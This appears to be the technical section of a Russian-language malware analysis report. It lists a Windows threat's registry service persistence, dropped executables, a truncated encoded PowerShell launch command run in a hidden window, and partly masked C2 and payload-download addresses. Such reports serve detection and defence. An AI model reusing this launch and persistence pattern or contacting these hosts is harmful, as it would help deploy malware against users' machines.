Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\NlsData004e] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\NlsData004e] 'ImagePath' = '"%WINDIR%\SysWOW64\RMActivate_ssp\NlsData004e.exe"'
- 'NlsData004e' "%WINDIR%\SysWOW64\RMActivate_ssp\NlsData004e.exe"
- 'NlsData004e' %WINDIR%\SysWOW64\RMActivate_ssp\NlsData004e.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGADUAcgB0AHoAegBnAD0AKAAnAFYAJwArACgAJwBnAGYAJwArACcAOQAnACkAKwAoACcAZQAnACsAJwBtADcAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFQAZQBNAFAAXAB3AE8AUgBEAFwAMgAwAD...
- %TEMP%\word\2019\buccmi.exe
- %WINDIR%\syswow64\rmactivate_ssp\nlsdata004e.exe
- %TEMP%\word\2019\buccmi.exe в %WINDIR%\syswow64\rmactivate_ssp\nlsdata004e.exe
- '98.##.75.196':80
- http://te####ojikibris.com/wp-content/Q/
- http://98.##.75.196/rJFNO/QvHgMhAloa2s/YyMywGd9Gk5h65ug/ZqdS7TCeB09SdqcQ/
- DNS ASK te####ojikibris.com
- '%TEMP%\word\2019\buccmi.exe'
- '%WINDIR%\syswow64\rmactivate_ssp\nlsdata004e.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGADUAcgB0AHoAegBnAD0AKAAnAFYAJwArACgAJwBnAGYAJwArACcAOQAnACkAKwAoACcAZQAnACsAJwBtADcAJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFQAZQBNAFAAXAB3AE8AUgBEAFwAMgAwAD...' (со скрытым окном)